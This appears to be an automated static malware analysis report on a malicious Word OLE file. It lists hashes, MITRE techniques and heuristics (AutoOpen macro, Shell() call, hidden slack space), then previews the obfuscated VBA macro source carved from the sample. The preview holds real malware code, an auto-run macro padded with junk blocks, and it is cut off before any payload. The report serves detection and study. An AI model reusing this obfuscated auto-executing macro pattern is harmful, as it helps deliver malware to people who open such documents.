Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c68daa4e3a8df3c9…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 164.0 KB | Created: 2018-04-26 19:43:00 | Authoring application: Microsoft Office Word | First seen: 2018-08-05
MD5: cc190d228439405ba1f52a957d0b32d1 | SHA-1: d1a46a1eafd03120a141ef87fc9c19f870c079f2 | SHA-256: c68daa4e3a8df3c9080890b170d9bbe63ca0ad94ac77f9cbfda098a972397166
Risk score: 182

Malware Insights

MITRE ATT&CK: T1059.005 (Visual Basic), T1204.002 (Malicious File)

The sample is a malicious OLE document containing a legacy WordBasic Autoopen macro that calls the Shell() function, indicating an attempt to execute arbitrary commands. The large slack space in the OLE structure is a further suspicious indicator. The document body is heavily obfuscated and provides no clear textual lure.

Heuristics (6)

  • VBA macros detected (medium, 2 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code.
  • Shell() call in VBA (critical) [OLE_VBA_SHELL]
    Shell() call in VBA.
  • AutoOpen macro (high) [OLE_VBA_AUTOOPEN]
    AutoOpen macro.
  • OLE document has large unaccounted-for region (high) [OLE_SLACK_ANOMALY]
    The OLE file is 167,936 bytes but its declared streams total only 27,331 bytes, so 140,605 bytes (84%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 54251 bytes
SHA-256: b1b256285fb0a764bcf8edac04808c0de6e74b625dd389d2dda47485d13d527b

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "twDPAuaHp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub kionAJ(cQFwdm)
Select Case NmfjO
         Case 49146
            zkVPJM = MrzjhT
            WGnHfN = Round(2975)
            KjcfCU = Hex(FovpAk - ChrW(TXrzmP))
            HMwTj = jrYjMh
         Case 21914
            ondKTd = CByte(73378)
            orStc = Log(QQiamQ)
End Select
End Sub
Sub UfLSd(NPMdS)
Select Case TijNm
         Case 36566
            mzYEAp = tbIAl
            vXUISr = Round(81258)
            YucOz = Hex(IIjDv - ChrW(zdEvb))
            dNKlG = rXiwJ
         Case 52187
            vcMNDw = CByte(81514)
            UHkvF = Log(dvRTZ)
End Select
Select Case GOcOmn
         Case 32160
            cqMwF = zfnQB
            kKIFaq = Round(2646)
            ObMdk = Hex(ohzzbP - ChrW(TYivlp))
            FwIBSZ = wFWovm
         Case 21059
            AdjOL = CByte(37438)
            fpplT = Log(liKoB)
End Select
Select Case APTLK
         Case 20937
            sbcIfd = LYAMX
            dnTTMj = Round(11677)
            KbMAui = Hex(shSYD - ChrW(bqCjJ))
            zFNdw = XaMwz
         Case 99032
            ERhAQI = CByte(71219)
            JSqioU = Log(CwQmC)
End Select
End Sub
Sub HazzO(XIzwhS)
Select Case wwtqlY
         Case 47112
            pmWvJ = HXQfNw
            zrkCC = Round(46629)
            mLWJP = Hex(WTJFiO - ChrW(KRnaCE))
            PkhQUV = AEJnjz
         Case 20376
            dPNfPa = CByte(76519)
            KAwSv = Log(DJzzkw)
End Select
Select Case iGouH
         Case 41147
            zSvOT = oYMXpN
            WWPVCs = Round(39480)
            zomPM = Hex(zJYlI - ChrW(YOsFj))
            LrfwcI = WfHrT
         Case 83085
            AOAiI = CByte(98576)
            KpOom = Log(IDHiJl)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case jcVCL
         Case 57981
            qtrSFt = DKOOwk
            ACQIpa = Round(26556)
            Ydhhn = Hex(YtwSiG - ChrW(Rzwjs))
            EstPMB = jZEtV
         Case 6392
            WVOkXG = CByte(22587)
            RPwSib = Log(FUZzmI)
End Select
cYusHHlWWjvf (iNUfcB + RYYOECYVM + oEwbbu)
Select Case jLLmcZ
         Case 52032
            TuXkzU = UYQWwq
            QriKh = Round(55107)
            zqCjm = Hex(IOLKj - ChrW(BtZIrD))
            EkYKFw = ivTIR
         Case 84295
            SUDUDK = CByte(97843)
            FMFmwo = Log(qjmGD)
End Select
End Sub
Sub bbfzi(nMvDtr)
Select Case jYWno
         Case 87068
            ciLFSB = aFjWL
            artXXU = Round(58536)
            PKJMu = Hex(FiUvzN - ChrW(uwPai))
            OMHLhh = asfwQ
         Case 37651
            TNTBt = CByte(45806)
            MsloY = Log(Ofudzs)
End Select
Select Case QwHzci
         Case 82886
            MDVid = FjdNhG
            BUWWIk = Round(79143)
            wBBXfw = Hex(GTZOj - ChrW(AoPJuz))
            wRQPm = OdkdT
         Case 89217
            ZOBTH = CByte(96927)
            laJoSa = Log(BjGMOk)
End Select
Select Case wjlllS
         Case 69765
            VqFUiM = mwCwzX
            IcwMY = Round(25480)
            iQFJVc = Hex(QhVjPt - ChrW(Siwvc))
            tKJSk = YYJpZ
         Case 87262
            trZAK = CByte(17860)
            DWOhPk = Log(TptwQw)
End Select
End Sub
Sub ETGnZM(JHswm)
Select Case AMshol
         Case 86397
            WwcCz = EjPqIz
            pYSNk = Round(93625)
            uPVkcs = Hex(GwMKfD - ChrW(hWilZh))
            asCopS = oZUDp
         Case 27104
            HbsZH = CByte(4125)
            mDjdtn = Log(BocKP)
End Select
End Sub

Attribute VB_Name = "XtJfLIsvCz"
Sub ppnwciwoB()
On Error Resume Next
Select Case occKfz
         Case 54575
            JkpLP = CBKYjw
            Xtklh = Round(19497)
            rpCsTl = Hex(QhVjLQ - ChrW(tMaiaz))
         
... (truncated)